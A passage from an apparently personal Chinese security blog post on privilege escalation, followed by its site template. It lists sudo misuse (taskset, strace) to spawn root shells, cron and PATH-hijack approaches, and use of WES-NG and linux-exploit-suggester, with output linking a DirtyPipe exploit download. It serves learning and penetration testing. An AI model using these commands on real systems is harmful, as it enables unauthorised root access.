  <figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs markdown"><br><span class="hljs-bullet">+</span> taskset提权<br><br></code></pre></td></tr></table></figure>
  sudo taskset 1 /bin/sh -p
  <figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs markdown"><br><span class="hljs-bullet">+</span> strace<br><br></code></pre></td></tr></table></figure>
  sudo strace -o/dev/null /bin/sh
  <figure class="highlight clean"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs clean">  <br><br>## (<span class="hljs-number">3</span>)计划任务提权<br><br>查看Root用户的计划任务<br><br></code></pre></td></tr></table></figure>
crontab -l -u root  //需要高权限
<figure class="highlight autohotkey"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs autohotkey"><br>低权限用户可通过查看`/etc/crontab`的方式获取<br><br></code></pre></td></tr></table></figure>
cat /etc/crontab
<figure class="highlight clean"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs clean"><br>如果发现有root权限的计划任务，并且可文件修改，即可以进行尝试<br><br>## (<span class="hljs-number">4</span>)环境变量劫持提权<br><br>用到的命令<br><br></code></pre></td></tr></table></figure>
exploit PATH=/tmp:$PATH
<figure class="highlight clean"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs clean"><br>## (<span class="hljs-number">5</span>)Docker容器提权<br><br><br><br># 二、Windows提权<br><br>## <span class="hljs-number">1</span>、通过利用漏洞提权<br><br>利用WES-NG提权辅助工具查找可用的提权漏洞<br><br>项目地址<br><br></code></pre></td></tr></table></figure>
https://github.com/bitsadmin/wesng
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs markdown"><br><span class="hljs-bullet">+</span> 更新漏洞数据库<br><br></code></pre></td></tr></table></figure>
python3 wes.py --update
<figure class="highlight nsis"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs nsis"><br>+ 在目标主机上执行<span class="hljs-params">system</span>info，获取目标主机的<span class="hljs-params">system</span>info信息<br><br></code></pre></td></tr></table></figure>
systeminfo &gt; sysinfo.txt
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs markdown"><br><span class="hljs-bullet">+</span> 查找提权漏洞<br><br></code></pre></td></tr></table></figure>
python3 wes.py ~/tmp/sysinfo.txt --impact &quot;Elevation of Privilege&quot;
<figure class="highlight 1c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs 1c"><br>查找已有公开<span class="hljs-built_in">EXP</span>的提权漏洞<br><br></code></pre></td></tr></table></figure>
python3 wes.py ~/tmp/sysinfo.txt --impact &quot;Elevation of Privilege&quot; --exploits-only
<figure class="highlight clean"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs clean"><br># 三、服务器系统<br><br>### (一)Windows<br><br>#### <span class="hljs-number">1</span>、针对环境<br><br>#### <span class="hljs-number">2</span>、提权方法<br><br>#### <span class="hljs-number">3</span>、针对版本<br><br>### (二)Linux<br><br>#### <span class="hljs-number">1</span>、辅助工具Linux_exploit_suggester<br><br></code></pre></td></tr></table></figure>
https://github.com/mzet-/linux-exploit-suggester
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs markdown"><br><span class="hljs-bullet">+</span> 使用<br><br></code></pre></td></tr></table></figure>
./linux-exploit-suggester.sh
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs"><br>返回结果<br><br></code></pre></td></tr></table></figure>
[+] [CVE-2022-0847] DirtyPipe

   Details: https://dirtypipe.cm4all.com/             (漏洞介绍)
   Exposure: probable
   Tags: [ ubuntu=(20.04|21.04) ],debian=11
   Download URL: https://haxx.in/files/dirtypipez.c       (EXP下载地址)</code></pre></li>
</ul>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/web-security/" class="category-chain-item">web security</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/web-security/" class="print-no-link">#web security</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>权限提升</div>
      <div>https://ixpqxi.github.io/2022/08/20/46bb6cfbfdcb/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>ixpqxi</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2022年8月20日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/09/01/d26b70cf87ba/" title="Metasploit">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Metasploit</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/06/01/2db6629e6caf/" title="git">
                        <span class="hidden-mobile">git</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
    <div id="giscus" class="giscus"></div>
    <script type="text/javascript">
      Fluid.utils.loadComments('#giscus', function() {
        var options = {"repo":"ixpqxi/ixpqxi.github.io","repo-id":"R_kgDOMZIPiQ","category":"Announcements","category-id":"DIC_kwDOMZIPic4C-cY_","mapping":"pathname","strict":0,"reactions-enabled":1,"emit-metadata":0,"input-position":"top","theme":"preferred_color_scheme","theme-dark":"preferred_color_scheme","lang":"en","loading":"lazy"};
        var attributes = {};
        for (let option in options) {
          if (!option.startsWith('theme-')) {
            var key = option.startsWith('data-') ? option : 'data-' + option;
            attributes[key] = options[option];
          }
        }
        var light = 'light';
        var dark = 'preferred_color_scheme';
        window.GiscusThemeLight = light;
        window.GiscusThemeDark = dark;
        attributes['data-theme'] = document.documentElement.getAttribute('data-user-color-scheme') === 'dark' ? dark : light;
        for (let attribute in attributes) {
          var value = attributes[attribute];
          if (value === undefined || value === null || value === '') {
            delete attributes[attribute];
          }
        }
        var s = document.createElement('script');
        s.setAttribute('src', 'https://giscus.app/client.js');
        s.setAttribute('crossorigin', 'anonymous');
        for (let attribute in attributes) {
          s.setAttribute(attribute, attributes[attribute]);
        }
        var ss = document.getElementsByTagName('script');
        var e = ss.length > 0 ? ss[ss.length - 1] : document.head || document.documentElement;
        e.parentNode.insertBefore(s, e.nextSibling);
      });
    </script>
    <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
  
  
  
    <a href="/atom.xml">RSS</a>
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
